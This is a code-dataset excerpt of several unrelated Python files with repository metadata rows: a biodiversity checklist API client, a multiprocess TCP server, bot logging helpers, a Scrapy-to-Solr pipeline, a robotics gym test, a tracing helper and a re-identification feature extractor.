:return:
"""
warnings.warn('this function is deprecated', DeprecationWarning)
return pd.DataFrame(checklist)
@staticmethod
def find_synonyms(*queries):
"""Find synonyms via species name
Find synonyms via species name from Catalogue of Life Global.
:param queries: species name.single or more query.
:return: set
"""
synonyms = {}
for query in queries:
synonyms_set = set()
query_no_space = re.sub(' ', '+', query)
data = json.loads(requests.get(
'http://webservice.catalogueoflife.org/col/webservice?name={}'
'&format=json&response=full'.format(query_no_space)).text)['results']
for entry in data:
if entry['name'] == query:
status = entry['name_status']
if status == 'synonym':
synonyms_set.add(entry['accepted_name']['name'])
elif status == 'accepted name':
for synonym in entry['synonyms']:
synonyms_set.add(synonym['name'])
synonyms[query] = synonyms_set
return synonyms
@staticmethod
def get_col_taiwan(*queries, level='species', option='equal', include_synonyms=True):
"""Search Catalogue of Life Taiwan checklist
Get Catalogue of Life Taiwan checklist via advanced query.
:param queries: The string to search for. single or more query
:param level: Query by category tree, tree should in ("kingdom","phylum","class","order","family","genus","name"),the default value is "name".
:param option: Query format, option should in ("contain","equal","beginning"),the default value is "equal".
:param include_synonyms: Whether the results contain a synonym or not.
:return:
"""
assert level in ['kingdom', 'phylum', 'class', 'order', 'family', 'genus', 'species'],\
'level should in ("kingdom","phylum","class","order","family","genus","species")'
assert option in ['contain', 'equal', 'begging'],\
'option should in ("contain","equal","beginning"),the default value is "equal".'
col_taiwan_dict = {}
for query in queries:
col_taiwan_list = []
if include_synonyms:
url = 'http://taibnet.sinica.edu.tw/eng/taibnet_xml.php?R1={tree}&D1=&' \
'D2={tree}&D3={option}&T1={query}+&T2=&id=y&sy=y'.format(tree=level, option=option, query=query)
else:
url = 'http://taibnet.sinica.edu.tw/eng/taibnet_xml.php?R1={tree}&D1=&' \
'D2={tree}&D3={option}&T1={query}+&T2=&id=y&sy='.format(tree=level, option=option, query=query)
x = requests.get(url).text
tree = ElementTree.fromstring(x)
for i in tree:
if i.tag == 'record':
col_dict = dict()
for element in i:
col_dict[element.tag] = element.text
col_taiwan_list.append(col_dict)
col_taiwan_dict[query] = col_taiwan_list
return col_taiwan_dict
@staticmethod
def get_redlist_china(query='', option='Scientific Names', group = 'Amphibians'):
"""Query Redlist of Chinese Biodiversity
Query Redlist of China’s Biodiversity of Vertebrate, Higher Plants and Macrofungi.
:param query: string The string to query for.
:param option: character There is one required parameter, which is either Chinese Names or Scientific Names.
Give eithera Chinese Names or Scientific Names. If an Scientific Names is given, the Chinese Names parameter
may not be used. Only exact matches found the name given will be returned. option=c(“Chinese Names”,
“Scientific Names”).
:param group: character There is one required parameter, group=c(“Amphibians”,“Birds”,“Inland Fishes”,
“Mammals”,“Reptiles”,“Plants”,“Fungi”).
:return: pandas DataFrame
"""
assert option in ['Chinese Names','Scientific Names'], \
'option should in ("Chinese Names","Scientific Names"),the default value is "Scientific Names".'
assert group in ["Amphibians","Birds","Inland Fishes","Mammals","Reptiles","Plants","Fungi", ""],\
'taxon should in ("Amphibians","Birds","Inland Fishes","Mammals","Reptiles","Plants","Fungi", "")'
try:
excel = pd.read_excel(open('RedlistChina.xlsx', 'rb'))
except FileNotFoundError:
data = requests.get('https://files.ynulhcloud.cn/RedlistChina.xlsx').content
with open('RedlistChina.xlsx', 'wb') as f:
f.write(data)
excel = pd.read_excel(open('RedlistChina.xlsx', 'rb'))
if query and group:
if option == 'Chinese Names':
df = excel[excel['species_c'].notna()][excel[excel['species_c'].notna()]
['species_c'].str.contains(query, regex=False)]
df = df[df['group'] == group]
else:
df = excel[excel['species'].notna()][excel[excel['species'].notna()]
['species'].str.contains(query, regex=False)]
df = df[df['group'] == group]
elif query:
df = excel[excel['species'].notna()][excel[excel['species'].notna()]
['species'].str.contains(query, regex=False)]
elif group:
df = excel[excel['group'] == group]
else:
df = None
return df
@staticmethod
def get_col_global(*queries, option='name', response='terse', start=0, limit = 500):
"""Search Catalogue of Life Global checklist
Get Catalogue of Life Global checklist via species name and id.
:param query: The string to search for.
:param option: There is one required parameter, which is either name or id. Give eithera name or an ID.
If an ID is given, the name parameter may not be used, and vice versa.
option should in ("id","name"),the default value is "name".
Only exact matches found the name given will be returned.
:param response: Type of response returned. Valid values are response=terse and response=full.
if the response parameter is omitted, the results are returned in the default terse format.
If format=terse then a minimum set of results are returned (this is faster and smaller, enough for name lookup),
if format=full then all available information is returned,
response=c("full","terse"),the default value is "terse".
:param start: The first record to return. If omitted, the results are returned from the first record (start=0).
This is useful if the total number of results is larger than the maximum number of results returned by a single
Web service query (currently the maximum number of results returned by a single query is 500 for terse queries
and 50 for full queries,the default value is 0.
:param limit: integer Number of records to return. This is useful if the total number of results is larger than
the maximum number of results returned by a single Web service query (currently the maximum number of results
returned by a single query is 500 for terse queries and 50 for full queries,the default value is 500.Note that
there is a hard maximum of 10,000, which is calculated as the limit+start, so start=99,00 and limit=2000
won’t work.
:return:
"""
assert option in ['name', 'id'], 'option should in (name, id).'
assert response in ['terse', 'full'], 'response should in (terse, full).'
result_dict = {}
for query in queries:
if option == 'name':
query_no_space = re.sub(' ', '+', query)
result = json.loads(requests.get('http://webservice.catalogueoflife.org/col/webservice?name={}'
'&format=json&response={}&start={}'.format(query_no_space, response, start)).text)\
.get('results', None)
else:
result = json.loads(requests.get('http://webservice.catalogueoflife.org/col/webservice?id={}'
'&format=json&response={}&start={}'.format(query, response, start)).text)\
.get('results', None)[:limit]
result_dict[query] = result
return result_dict
sp2000 = SP2000()
set_search_key = sp2000.set_search_key
search_family_id = sp2000.search_family_id
search_taxon_id = sp2000.search_taxon_id
search_checklist = sp2000.search_checklist
list_df = sp2000.list_df
find_synonyms = sp2000.find_synonyms
get_col_taiwan = sp2000.get_col_taiwan
get_redlist_china = sp2000.get_redlist_china
get_col_global = sp2000.get_col_global
if __name__ == '__main__':
from pprint import pprint
api_key = 'null'
sp2000.set_search_key(api_key)
# print(sp2000.search_taxon_id('1233542354', stype='family_id'))
# print(sp2000.search_taxon_id('Uncia uncia', stype='scientific_name'))
# print(sp2000.search_taxon_id('Uncia uncia', 'Anguilla marmorata', stype='scientific_name'))
# print(sp2000.search_checklist('b8c6a086-3d28-4876-8e8a-ca96e667768d'))
# print(sp2000.find_synonyms('Anguilla anguilla'))
# print(sp2000.get_col_taiwan("Anguilla marmorata","Anguilla japonica","Anguilla bicolor","Anguilla nebulosa", "Anguilla luzonensis", tree="name", option="contain"))
# print(sp2000.search_taxon_id('bf72e220caf04592a68c025fc5c2bfb7', stype='family_id'))
#
# r = sp2000.get_col_taiwan(query="Anguilla",tree="name",option = "contain")
# pprint(sp2000.search_checklist('b8c6a086-3d28-4876-8e8a-ca96e667768d'))
# print(len(sp2000.get_col_global("Platalea leucorodia", option="name")['Platalea leucorodia']))
# print(sp2000.get_col_taiwan("Anguilla", "Anguilla"))
# print(sp2000.get_col_global("Anguilla marmorata","Anguilla japonica",
# "Anguilla bicolor","Anguilla nebulosa","Anguilla luzonensis",option="name"))
# print(sp2000.search_taxon_id('Actinidia arg', name = 'scientific_name'))
# print(sp2000.search_checklist('123', 'T20171000100267', '123124'))
# print(sp2000.get_redlist_china(query= 'Anguilla', option = "ScientificName", group='Inland Fishes'))
| 51.491071 | 169 | 0.598405 | 2,072 | 17,301 | 4.915058 | 0.16361 | 0.010998 | 0.010801 | 0.013747 | 0.556952 | 0.488511 | 0.440691 | 0.417027 | 0.375786 | 0.353594 | 0 | 0.0262 | 0.291833 | 17,301 | 335 | 170 | 51.644776 | 0.805011 | 0.366279 | 0 | 0.331606 | 0 | 0.015544 | 0.23897 | 0.039261 | 0 | 0 | 0 | 0 | 0.056995 | 1 | 0.051813 | false | 0 | 0.036269 | 0 | 0.134715 | 0.005181 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d1303ad9297d22de2971122e8b251bda9017b249 | 2,544 | py | Python | aio_tcpserver/serve_multiple.py | Basic-Components/aio-tcpserver | 39e90a9e77262640d548fdd15e6f80649f872400 | [
"MIT"
] | 7 | 2018-03-06T11:06:00.000Z | 2022-03-31T09:24:49.000Z | aio_tcpserver/serve_multiple.py | Basic-Components/aio-tcpserver | 39e90a9e77262640d548fdd15e6f80649f872400 | [
"MIT"
] | 1 | 2022-03-31T09:24:39.000Z | 2022-03-31T09:24:39.000Z | aio_tcpserver/serve_multiple.py | Basic-Components/aio-tcpserver | 39e90a9e77262640d548fdd15e6f80649f872400 | [
"MIT"
] | 3 | 2019-12-11T07:12:20.000Z | 2021-08-13T04:15:38.000Z | """多进程执行tcp服务.
签名为:multiple_tcp_serve(server_settings: dict, workers: int)->None
"""
import os
from multiprocessing import Process
from typing import Dict, Any
from socket import (
socket,
SOL_SOCKET,
SO_REUSEADDR
)
from signal import (
SIGTERM, SIGINT,
signal as signal_func,
Signals
)
from .errors import MultipleProcessDone
from .server_single import tcp_serve
from .log import server_logger as logger
def multiple_tcp_serve(server_settings: Dict[str, Any], workers: int)->None:
"""启动一个多进程的tcp服务,他们共享同一个socket对象.
用multiple模式在每个子进程执行tcp服务,当执行完成后统一的回收资源
Params:
server_settings (Dicct[str, Any]) : - 每个单一进程的设置,
workers (int) : - 执行的进程数
"""
server_settings['reuse_port'] = True
server_settings['run_multiple'] = True
# Handling when custom socket is not provided.
if server_settings.get('sock') is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings['host'], server_settings['port']))
sock.set_inheritable(True)
server_settings['sock'] = sock
server_settings['host'] = None
server_settings['port'] = None
def sig_handler(signal: Any, frame: Any):
"""向子进程传送SIGTERM信号,用于关闭所有子进程中运行的事件循环.
Params:
signal (Any) : - 要处理的信号
frame (Any) : - 执行到的帧
"""
status = []
for process in processes:
statu = process.is_alive()
status.append(statu)
if statu:
os.kill(process.pid, SIGTERM)
if any(status):
logger.info(
"""Received signal {}. Shutting down. You may need to enter Ctrl+C again.
""".format(Signals(signal).name))
else:
raise MultipleProcessDone("all process not alive")
signal_func(SIGINT, sig_handler)
signal_func(SIGTERM, sig_handler)
processes = []
for _ in range(workers):
process = Process(target=tcp_serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
try:
while True:
pass
except MultipleProcessDone as done:
logger.info(str(done))
except Exception as e:
raise e
finally:
for process in processes:
process.join()
# 使用join同步后,只有进程运行结束了才关闭子进程
for process in processes:
process.terminate()
server_settings.get('sock').close()
logger.info("Shutting down done.")
| 26.5 | 89 | 0.621462 | 277 | 2,544 | 5.577617 | 0.407942 | 0.117799 | 0.023301 | 0.040777 | 0.080259 | 0.044013 | 0 | 0 | 0 | 0 | 0 | 0.000547 | 0.281053 | 2,544 | 95 | 90 | 26.778947 | 0.844177 | 0.16195 | 0 | 0.04918 | 0 | 0 | 0.045802 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032787 | false | 0.016393 | 0.131148 | 0 | 0.163934 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d1333d943699da4c1ce17cde48edc0e62fcebc8d | 1,565 | py | Python | bin/utils/logs.py | IshanManchanda/DeepFryBot | bb83c8bc0c92ab1d984ead385940270dd73a3658 | [
"MIT"
] | 6 | 2019-06-06T15:15:56.000Z | 2020-11-23T19:55:37.000Z | bin/utils/logs.py | IshanManchanda/DeepFryBot | bb83c8bc0c92ab1d984ead385940270dd73a3658 | [
"MIT"
] | 149 | 2020-11-22T15:53:34.000Z | 2022-03-24T23:17:42.000Z | bin/utils/logs.py | IshanManchanda/DeepFryBot | bb83c8bc0c92ab1d984ead385940270dd73a3658 | [
"MIT"
] | null | null | null | from datetime import datetime
from inspect import currentframe, getframeinfo
from sys import stdout
from pytz import timezone
def log_debug(message):
cf = currentframe()
file = getframeinfo(cf).filename
line = cf.f_back.f_lineno
timestamp = datetime.now(tz=timezone('Asia/Kolkata'))
stdout.write(f'DEBUG {timestamp} <line {line}, {file}>: {message}\n')
def log_info(message):
timestamp = datetime.now(tz=timezone('Asia/Kolkata'))
stdout.write(f'INFO {timestamp}: {message}\n')
def log_warn(message):
cf = currentframe()
file = getframeinfo(cf).filename
line = cf.f_back.f_lineno
timestamp = datetime.now(tz=timezone('Asia/Kolkata'))
stdout.write(f'WARN {timestamp} <line {line}, {file}>: {message}\n')
def log_error(message):
cf = currentframe()
file = getframeinfo(cf).filename
line = cf.f_back.f_lineno
timestamp = datetime.now(tz=timezone('Asia/Kolkata'))
stdout.write(f'WARN {timestamp} <line {line}, {file}>: {message}\n')
def log_command(update, command):
log_info(f'{{{command}}} {{{generate_log_message(update)}}}')
def log_message(update):
log_info(generate_log_message(update))
def generate_log_message(update):
return (
'(%s[%s]) %s[%s]: %s' % (
update.message.chat.title,
update.message.chat.id,
update.message.from_user.first_name,
update.message.from_user.id,
update.message.text if update.message.text else '<media file>'
)
if update.message.chat.type != 'private' else
'%s[%s]: %s' % (
update.message.from_user.first_name,
update.message.from_user.id,
update.message.text
)
)
| 24.453125 | 70 | 0.711821 | 221 | 1,565 | 4.923077 | 0.217195 | 0.119485 | 0.073529 | 0.080882 | 0.673713 | 0.606618 | 0.606618 | 0.606618 | 0.574449 | 0.574449 | 0 | 0 | 0.127796 | 1,565 | 63 | 71 | 24.84127 | 0.79707 | 0 | 0 | 0.422222 | 0 | 0 | 0.208946 | 0.021725 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155556 | false | 0 | 0.088889 | 0.022222 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d133b45aeed98c9fea851ca7c3a5dde3e6421e29 | 3,447 | py | Python | sleuth_crawler/scraper/scraper/pipelines.py | ubclaunchpad/sleuth | 7b7be0b7097a26169e17037f4220fd0ce039bde1 | [
"MIT"
] | 12 | 2017-09-17T02:14:35.000Z | 2022-01-09T10:14:59.000Z | sleuth_crawler/scraper/scraper/pipelines.py | ubclaunchpad/sleuth | 7b7be0b7097a26169e17037f4220fd0ce039bde1 | [
"MIT"
] | 92 | 2017-09-16T23:50:45.000Z | 2018-01-02T01:56:33.000Z | sleuth_crawler/scraper/scraper/pipelines.py | ubclaunchpad/sleuth | 7b7be0b7097a26169e17037f4220fd0ce039bde1 | [
"MIT"
] | 5 | 2017-12-26T01:47:36.000Z | 2021-12-31T11:15:07.000Z | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import json, time, datetime
from sleuth_backend.views.views import SOLR
from sleuth_backend.solr.models import *
from sleuth_crawler.scraper.scraper.items import *
class SolrPipeline(object):
"""
Process item and store in Solr
"""
def __init__(self, solr_connection=SOLR):
self.solr_connection = solr_connection
def close_spider(self, spider=None):
'''
Defragment Solr database after spider completes task
'''
print("Closing scraper: Emptying all queued documents")
self.solr_connection.insert_queued()
print("Closing scraper: Optimizing all cores")
self.solr_connection.optimize()
def process_item(self, item, spider=None):
'''
Match item type to predefined Schemas
https://github.com/ubclaunchpad/sleuth/wiki/Schemas
'''
if isinstance(item, ScrapyGenericPage):
self.__process_generic_page(item)
elif isinstance(item, ScrapyCourseItem):
self.__process_course_item(item)
elif isinstance(item, ScrapyRedditPost):
self.__process_reddit_post(item)
return item
def __process_generic_page(self, item):
'''
Convert Scrapy item to Solr GenericPage and commit it to database
Schema specified by sleuth_backend.solr.models.GenericPage
'''
solr_doc = GenericPage(
id=item["url"],
type="genericPage",
name=item["title"],
siteName=item["site_title"],
updatedAt=self.__make_date(),
content=self.__parse_content(item["raw_content"]),
description=item["description"],
links=item["links"]
)
solr_doc.save_to_solr(self.solr_connection)
def __process_course_item(self, item):
'''
Convert Scrapy item to Solr CourseItem and commit it to database
'''
subject = item['subject']
solr_doc = CourseItem(
id=item['url'],
type='courseItem',
name=item['name'],
updatedAt=self.__make_date(),
description=item['description'],
subjectId=subject['url'],
subjectName=subject['name'],
faculty=subject['faculty']
)
solr_doc.save_to_solr(self.solr_connection)
def __process_reddit_post(self, item):
'''
Convert Scrapy item to Solr ReddiPost and commit it to database
'''
solr_doc = RedditPost(
id=item['url'],
type='redditPost',
name=item['title'],
updatedAt=self.__make_date(),
description=item['post_content'],
comments=item['comments'],
links=item['links'],
)
solr_doc.save_to_solr(self.solr_connection)
def __make_date(self):
"""
Make a UTC date string in format 'Y-m-d H:M:S'
"""
stamp = time.time()
style = '%Y-%m-%d %H:%M:%S'
return datetime.datetime.fromtimestamp(stamp).strftime(style)
def __parse_content(self, raw_content):
"""
Parse content list into single string
TODO: make smarter
"""
data = ' '.join(raw_content)
return data
| 32.518868 | 73 | 0.604584 | 384 | 3,447 | 5.221354 | 0.359375 | 0.05586 | 0.062843 | 0.04389 | 0.212968 | 0.166085 | 0.12419 | 0.077805 | 0.077805 | 0.077805 | 0 | 0.000408 | 0.288657 | 3,447 | 105 | 74 | 32.828571 | 0.817292 | 0.206847 | 0 | 0.126984 | 0 | 0 | 0.098458 | 0 | 0 | 0 | 0 | 0.009524 | 0 | 1 | 0.126984 | false | 0 | 0.063492 | 0 | 0.253968 | 0.031746 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d135b2968e3ad54042aa337d0eae95a9b9ac92e7 | 901 | py | Python | openai_ros/src/test_gym_env.py | suresh-guttikonda/openai-rosbot-env | e34a5843c8218ae733ee4e0d3ccecdf13ccafd87 | [
"Apache-2.0"
] | null | null | null | openai_ros/src/test_gym_env.py | suresh-guttikonda/openai-rosbot-env | e34a5843c8218ae733ee4e0d3ccecdf13ccafd87 | [
"Apache-2.0"
] | null | null | null | openai_ros/src/test_gym_env.py | suresh-guttikonda/openai-rosbot-env | e34a5843c8218ae733ee4e0d3ccecdf13ccafd87 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
import sys
def set_path(path: str):
try:
sys.path.index(path)
except ValueError:
sys.path.insert(0, path)
# set programatically the path to 'openai_ros' directory (alternately can also set PYTHONPATH)
set_path('/media/suresh/research/awesome-robotics/active-slam/catkin_ws/src/openai-rosbot-env/openai_ros/src')
from openai_ros.task_envs.turtlebot3 import turtlebot3_world
import gym
import rospy
import numpy as np
if __name__ == '__main__':
# create a new ros node
rospy.init_node('turtlebot3_world')
# create a new gym environment
env = gym.make('TurtleBot3World-v0')
observation = env.reset()
for i in range(10):
action = np.random.randint(0, 2)
print(action)
env.step(action)
env.close()
# prevent the code from exiting until an shutdown signal (ctrl+c) is received
rospy.spin()
| 24.351351 | 110 | 0.697003 | 130 | 901 | 4.692308 | 0.653846 | 0.044262 | 0.032787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015278 | 0.200888 | 901 | 36 | 111 | 25.027778 | 0.831944 | 0.267481 | 0 | 0 | 0 | 0.047619 | 0.21374 | 0.149618 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.238095 | 0 | 0.285714 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d13732d92b7461da43a38631ed1c6e40b76477f6 | 1,927 | py | Python | bentoml/tracing/opentrace.py | Shumpei-Kikuta/BentoML | 4fe508934ab431ea5c414ee9d8b84c2104688381 | [
"Apache-2.0"
] | null | null | null | bentoml/tracing/opentrace.py | Shumpei-Kikuta/BentoML | 4fe508934ab431ea5c414ee9d8b84c2104688381 | [
"Apache-2.0"
] | null | null | null | bentoml/tracing/opentrace.py | Shumpei-Kikuta/BentoML | 4fe508934ab431ea5c414ee9d8b84c2104688381 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
from contextlib import contextmanager
from contextvars import ContextVar
from functools import partial
span_context_var = ContextVar('span context', default=None)
def initialize_tracer(service_name):
# pylint: disable=E0401
from jaeger_client.config import Config
from opentracing.scope_managers.asyncio import AsyncioScopeManager
# pylint: enable=E0401
config = Config(
config={'sampler': {'type': 'const', 'param': 1}},
service_name=service_name,
validate=True,
scope_manager=AsyncioScopeManager(),
)
return config.initialize_tracer()
@contextmanager
def trace(
server_url=None, # @UnusedVariable
request_headers=None,
async_transport=False, # @UnusedVariable
sample_rate=1.0, # @UnusedVariable
standalone=False, # @UnusedVariable
is_root=False, # @UnusedVariable
service_name="some service",
span_name="service procedure",
port=0, # @UnusedVariable
):
"""
Opentracing tracer function
"""
del server_url, async_transport, sample_rate, standalone, is_root, port
# pylint: disable=E0401
import opentracing
from opentracing import Format
# pylint: enable=E0401
tracer = initialize_tracer(service_name) or opentracing.global_tracer() or None
if tracer is None:
yield
return
span_context = None
span_context_saved = span_context_var.get()
if request_headers is not None:
span_context = tracer.extract(Format.HTTP_HEADERS, request_headers)
if span_context is None:
span_context = span_context_saved or None
with tracer.start_active_span(
operation_name=span_name, child_of=span_context
) as scope:
token = span_context_var.set(scope.span.context)
yield scope
span_context_var.reset(token)
async_trace = partial(trace, async_transport=True)
| 25.693333 | 83 | 0.704203 | 225 | 1,927 | 5.813333 | 0.377778 | 0.109327 | 0.042813 | 0.041284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013816 | 0.211209 | 1,927 | 74 | 84 | 26.040541 | 0.846711 | 0.128697 | 0 | 0 | 0 | 0 | 0.03753 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.152174 | 0 | 0.23913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d13b98d360b55349ec9935550adb0e927f70dabb | 6,140 | py | Python | tools/test_on_one_img.py | Ehsan-Yaghoubi/You-Look-So-Different-Haven-t-I-Seen-You-a-Long-Time-Ago | 40cf189dd81f1b6048befadd1de895d8494c4635 | [
"MIT"
] | 1 | 2022-03-14T10:58:32.000Z | 2022-03-14T10:58:32.000Z | tools/test_on_one_img.py | Ehsan-Yaghoubi/You-Look-So-Different-Haven-t-I-Seen-You-a-Long-Time-Ago | 40cf189dd81f1b6048befadd1de895d8494c4635 | [
"MIT"
] | 1 | 2021-11-10T04:19:40.000Z | 2021-11-15T13:56:41.000Z | tools/test_on_one_img.py | Ehsan-Yaghoubi/You-Look-So-Different-Haven-t-I-Seen-You-a-Long-Time-Ago | 40cf189dd81f1b6048befadd1de895d8494c4635 | [
"MIT"
] | null | null | null | import os
import sys
import torch
import numpy as np
sys.path.append('.')
from config import cfg
from data.transforms import build_transforms
from modeling.baseline import Baseline
from PIL import Image
import argparse
def load_image(image_name):
image = Image.open(image_name)
val_transforms = build_transforms(cfg, is_train=False)
image = val_transforms(image)
image = image.unsqueeze(0)
return image
def load_trained_model(cfg, checkpoint_path):
num_classes = 10
#_model = Baseline(num_classes, 1, '/media/socialab157/2cbae9f1-6394-4fa9-b963-5ef890eee044/A_PROJECTS/LOCAL/cvpr2021/_01_preprocessing_step/resnet50-19c8e357.pth', 'bnneck', 'after', 'resnet50', 'imagenet')
_model = Baseline(num_classes, cfg.MODEL.LAST_STRIDE, cfg.MODEL.PRETRAIN_PATH, cfg.MODEL.NECK, cfg.TEST.NECK_FEAT, cfg.MODEL.NAME, cfg.MODEL.PRETRAIN_CHOICE)
_model.load_param(checkpoint_path)
_model.eval()
return _model
def save_inferenced_features(cfg, save_feat_dir, checkpoint_path):
os.makedirs(save_feat_dir, exist_ok=True)
main_dir = cfg.DATASETS.ROOT_DIR
# prepare the model
model = load_trained_model(cfg, checkpoint_path)
print("checkpoint was loaded successfully. Next, images are fed to the model one by one for feature extraction.")
folders = os.listdir(main_dir)
for index, name in enumerate(folders):
if os.path.isdir(os.path.join(main_dir, name)):
for fol, folder_name in enumerate(folders):
sub_names = os.listdir(os.path.join(main_dir,folder_name))
print("Done Parent Folders: \t{}/{}".format(fol, len(folders)))
for i, sub__name in enumerate(sub_names):
if os.path.isdir(os.path.join(main_dir, folder_name, sub__name)):
pid_imgs = os.listdir(os.path.join(main_dir, folder_name, sub__name))
print("Done child1 Folders: \t{}/{}".format(i, len(sub_names)))
for ii, sub_sub_name in enumerate(pid_imgs):
if os.path.isdir(os.path.join(main_dir, folder_name, sub__name, sub_sub_name)):
sub_sub_files = os.listdir(os.path.join(main_dir, folder_name, sub__name, sub_sub_name))
for iii, sub_sub_file_name in enumerate(sub_sub_files):
image = load_image(os.path.join(main_dir, folder_name, sub__name, sub_sub_name, sub_sub_file_name))
with torch.no_grad():
features = model(image)
feature_arry = features.numpy()
file = os.path.join(save_feat_dir, "{}.npy".format(sub_sub_file_name))
np.save(file=file, arr=feature_arry)
print("sub_sub_sub: feature extraction: \t{}/{}".format(iii, len(sub_sub_files)))
else:
image = load_image(os.path.join(main_dir, folder_name, sub__name, sub_sub_name))
with torch.no_grad():
features = model(image)
feature_arry = features.numpy()
file = os.path.join(save_feat_dir, "{}.npy".format(sub_sub_name))
np.save(file=file, arr=feature_arry)
print("sub_sub: feature extraction: \t{}/{}".format(ii, len(pid_imgs)))
else:
image = load_image(os.path.join(main_dir, folder_name, sub__name))
with torch.no_grad():
features = model(image)
feature_arry = features.numpy()
file = os.path.join(save_feat_dir, "{}.npy".format(sub__name))
np.save(file=file, arr=feature_arry)
print("sub: feature extraction: \t{}/{}".format(i, len(sub_names)))
else:
image = load_image(os.path.join(main_dir, name))
with torch.no_grad():
features = model(image)
feature_arry = features.numpy()
file = os.path.join(save_feat_dir, "{}.npy".format(name))
np.save(file=file, arr=feature_arry)
print("feature extraction: \t{}/{}".format(index, len(folders)))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="ReID Baseline Training")
parser.add_argument(
"--config_file", default="../configs/strong_baseline.yml", help="path to config file", type=str
)
parser.add_argument("opts", help="Modify config options using the command-line", default=None,
nargs=argparse.REMAINDER)
args = parser.parse_args()
num_gpus = int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1
if args.config_file != "":
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
save_feat_dir_STB = "/media/socialab157/2cbae9f1-6394-4fa9-b963-5ef890eee044/A_PROJECTS/LOCAL/cvpr2021/YLD_YouLookDifferent/OUTPUT/tsne/strongbaseline_long_term_representations_20ids_testdata"
checkpoint_path_STB = "/media/socialab157/2cbae9f1-6394-4fa9-b963-5ef890eee044/A_PROJECTS/LOCAL/cvpr2021/YLD_YouLookDifferent/OUTPUT/strong_baseline/train_2021_Mar_08_12_31_22/resnet50_model_50.pth"
save_feat_dir_BSTF = "/media/socialab157/2cbae9f1-6394-4fa9-b963-5ef890eee044/A_PROJECTS/LOCAL/cvpr2021/YLD_YouLookDifferent/OUTPUT/tsne/BSTF_long_term_representations_20ids_testdata"
checkpoint_path_BSTF = "/media/socialab157/2cbae9f1-6394-4fa9-b963-5ef890eee044/A_PROJECTS/LOCAL/cvpr2021/YLD_YouLookDifferent/OUTPUT/Network2/paper_256to128_senet154/senet154_model_235.pth"
save_feat_dir = save_feat_dir_STB # change .yml file also
checkpoint_path = checkpoint_path_STB # change .yml file also
save_inferenced_features(cfg, save_feat_dir, checkpoint_path)
| 51.166667 | 211 | 0.627036 | 764 | 6,140 | 4.755236 | 0.242147 | 0.028076 | 0.038536 | 0.038536 | 0.543628 | 0.527938 | 0.46986 | 0.442334 | 0.442334 | 0.376824 | 0 | 0.040989 | 0.268893 | 6,140 | 119 | 212 | 51.596639 | 0.768323 | 0.043648 | 0 | 0.206522 | 0 | 0.043478 | 0.195808 | 0.119121 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032609 | false | 0 | 0.097826 | 0 | 0.152174 | 0.076087 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d13e4428aa9e33af23d4e82833626b3992a31414 | 9,509 | py | Python | tools/db/database.py | Petes77/Azure-Security-Stack-Map | a02b9a178e3756680c9ec511159bf8f2d7ff50f3 | [
"Apache-2.0"
] | 154 | 2021-06-29T20:25:02.000Z | 2022-03-28T22:03:11.000Z | tools/db/database.py | Petes77/Azure-Security-Stack-Map | a02b9a178e3756680c9ec511159bf8f2d7ff50f3 | [
"Apache-2.0"
